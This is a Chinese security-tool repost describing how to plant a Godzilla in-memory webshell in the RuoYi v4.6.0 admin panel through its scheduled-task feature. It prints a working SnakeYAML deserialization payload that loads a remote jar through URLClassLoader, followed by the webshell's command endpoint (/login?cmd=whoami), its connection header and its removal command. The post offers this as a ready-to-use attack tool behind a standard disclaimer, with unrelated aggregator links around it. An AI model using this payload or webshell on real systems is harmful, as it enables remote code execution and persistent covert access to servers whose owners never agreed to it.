专栏名称: Web安全工具库
将一些好用的web安全工具和自己的学习笔记分享给大家。。。
目录
相关文章推荐
小众软件  ·  用户狂喜,免费工具让 Windows 7 ... ·  2 天前  
APPSO  ·  杨植麟和梁文锋,论文撞车了 ·  2 天前  
APPSO  ·  最低调的「AI 六小龙」阶跃星辰,在 ... ·  3 天前  
小众软件  ·  另外两件事[250221] ·  3 天前  
APPSO  ·  刚刚,DeepSeek ... ·  3 天前  
51好读  ›  专栏  ›  Web安全工具库

ruoyi 后台定时任务注入哥斯拉内存马(3月1日更新)

Web安全工具库  · 公众号  ·  · 2024-03-01 17:43

正文

===================================

免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络, 安全性自测 ,如有侵权请联系删除。

0x01 工具介绍

ruoyi 后台定时任务注入哥斯拉内存马。

0x02 安装与使用

一、测试环境
ruoyi v4.6.0
二、用法
使用 mvn clean package 打包生成 jar,或者直接下载 release 中的 jar,放在 web 路径下

ruoyi 后台创建定时任务

payload 

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [  !!java.net.URLClassLoader [[    !!java.net.URL ["http://127.0.0.1:12346/yaml-payload-for-ruoyi-1.0-SNAPSHOT.jar"]   ]]]')

执行定时任务

web 服务器接受到请求

执行命令 /login?cmd=whoami

哥斯拉连接,需要配置请求头 X-Cmd-Ruoyi: 任意字符串

连接地址 /login?cmd=1,有 cmd 参数即可

删除内存马 /login?cmd=delete

0x03 项目链接下载






请到「今天看啥」查看全文


推荐文章
小众软件  ·  用户狂喜,免费工具让 Windows 7 运行最新软件,无需升级。
2 天前
APPSO  ·  杨植麟和梁文锋,论文撞车了
2 天前
APPSO  ·  最低调的「AI 六小龙」阶跃星辰,在 DeepSeek 浪潮中交出了一份新答卷
3 天前
小众软件  ·  另外两件事[250221]
3 天前
APPSO  ·  刚刚,DeepSeek 宣布下周连发五个开源项目!真 OpenAI 来了
3 天前
哎咆科技  ·  Airpods首只广告,黑人小哥骚断腿
8 年前
金融行业网  ·  在银行存钱存错了也会被捕!你也可能掉进这个坑
7 年前
老虎财富  ·  疯狂时代将谢幕:房价泡沫一定会破,就在这一两年
7 年前
加措上师语录  ·  今天,永远都是起点
7 年前
科研圈  ·  我们需要你,麻烦点进来!
7 年前
Sov5搜索   ·   小百科   ·   今天看啥   ·   移动版
51好读 - 好文章就要读起来!